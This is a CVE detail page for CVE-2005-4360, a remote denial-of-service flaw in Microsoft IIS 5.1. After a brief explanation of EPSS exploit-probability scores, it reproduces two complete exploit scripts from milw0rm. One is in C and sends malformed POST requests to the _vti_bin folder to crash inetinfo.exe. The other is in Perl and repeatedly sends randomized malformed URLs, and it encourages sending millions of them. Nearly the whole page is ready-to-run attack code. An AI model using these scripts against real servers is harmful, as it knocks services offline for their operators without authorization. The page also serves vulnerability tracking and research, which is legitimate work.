CVE-2005-4360 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/***************************************************************** Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan Application: Microsoft IIS (Internet Information Server) Vendor: Microsoft - http://www.microsoft.com/ Discovered by: Inge Henriksen Exploit Coded by: Kozan Credits to ATmaCA, Inge Henriksen Web: www.spyinstructors.com Mail: [email protected] Vulnerable: Microsoft® Internet Information Server® V5.1 Not vulnerable: Microsoft® Internet Information Server® V5.0 Microsoft® Internet Information Server® V6.0 Only folders with Execute Permissions set to 'Scripts & Executables' are affected, such as the '_vti_bin' directory. inetinfo.exe will be crashed after exploitation finished successfuly. Usage: iis51dos.exe [Target Url or IP] *****************************************************************/ #include <winsock2.h> #include <stdio.h> #include <windows.h> #pragma comment(lib, "ws2_32.lib") char *HttpHeader(char *pszHost) { char szHeader[1000]; wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Host: %s\r\n" "Content-Length: 0\r\n\r\n" , pszHost ); return szHeader; } int main(int argc, char *argv[]) { fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n" "Bug Discovered by: Inge Henriksen\n" "Exploit Coded by: Kozan\n" "Credits to ATmaCA, Inge Henriksen\n" "www.spyinstructors.com - [email protected]\n\n" ); if( argc != 2 ) { fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]); return -1; } WSADATA wsaData; struct hostent *pTarget; struct sockaddr_in addr; SOCKET sock; char szHeader[1000], szWebUrl[1000]; lstrcpy(szWebUrl, argv[1]); lstrcpy(szHeader, HttpHeader(szWebUrl)); if( WSAStartup(0x0101,&wsaData) < 0 ) { fprintf(stderr, "Winsock error!\n"); return -1; } sock = socket(AF_INET,SOCK_STREAM,0); if( sock == -1 ) { fprintf(stderr, "Socket error!\n"); return -1; } if( (pTarget = gethostbyname(szWebUrl)) == NULL ) { fprintf(stderr, "Address resolve error!\n"); return -1; } memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(80); memset(&(addr.sin_zero), '\0', 8); fprintf(stdout, "Please wait while connecting...\n"); if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 ) { fprintf(stderr, "Connection failed!\n"); closesocket(sock); return -1; } fprintf(stdout, "Connected.\n\n"); fprintf(stdout, "Please wait while sending DoS request headers...\n\n"); for( int i=0; i<4; i++ ) { fprintf(stdout, "Sending %d. request...\n", i+1); if( send(sock, szHeader, lstrlen(szHeader),0) == -1 ) { fprintf(stderr, "%d. DoS request header could not sent!\n", i+1); closesocket(sock); return -1; } fprintf(stdout, "%d. request sent.\n\n", i+1); } fprintf(stdout, "Operation completed...\n"); closesocket(sock); WSACleanup(); return 0; } // milw0rm.com [2005-12-19]

#!/usr/bin/perl # _really_ bored kokanin / IIS 5.1 dos thing, Inge says to use a browser at # http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html # kokanin not like puny browser!!"#1 I hoped Inge was a leet haxx0r ch1ck, but it's # apparently a dude, bummer. According to Inge passing a kinda malformed url to # an executable dir a few times makes inetinfo.exe crap out. Yum, monday. This # script has insanely elite randomization of the url, it even amazes me. # Hello ilja, ptp people, others, see you at ccc and stuff. # sample executable dirs: /_vti_bin/ /_sharepoint/ /scripts/ /cgi-bin/ /msadc/ /iisadmpwd/ # sample malformed url: http://www.example.xom/_vti_bin/.dll/*\~0 # sample run: ./this-crap.pl <www.host.bla> </executable_folder/> <count> # count should be 4 according to inge, do more!!!!1one MILLIONS I SAY!!! use List::Util 'shuffle'; use IO::Socket::INET; $target = shift; $folder = shift; $amount = shift; # main iteration thingie for(1..$amount){ # construct an array of the reportedly bad characters for(1..31){ @badchars[$_] = chr($_); } # append the rest of them @badchars = (@badchars,"?","\"","*",":","<",">"); # shuffle the array so @shuffled[0] is random @shuffled = shuffle(@badchars); # this is the request $malformed = $folder . ".dll/" . @shuffled[0] . "/~" . int rand(9); # this is informative text print "[$_]\t greeting $target with: " . $malformed . "\n"; # create the socket $socket = new IO::Socket::INET( Proto => "tcp", PeerAddr => $target, PeerPort => "80", ); # error reporting die "unable to connect to $target ($!) - omgomgwtf itz dead w00t w00t \n" unless $socket; # the actual data transmission print $socket "GET " . $malformed . " HTTP/1.0\r\n" . "Host: $target\r\n" . "\r\n\r\n"; # all done close $socket; } # milw0rm.com [2005-12-19]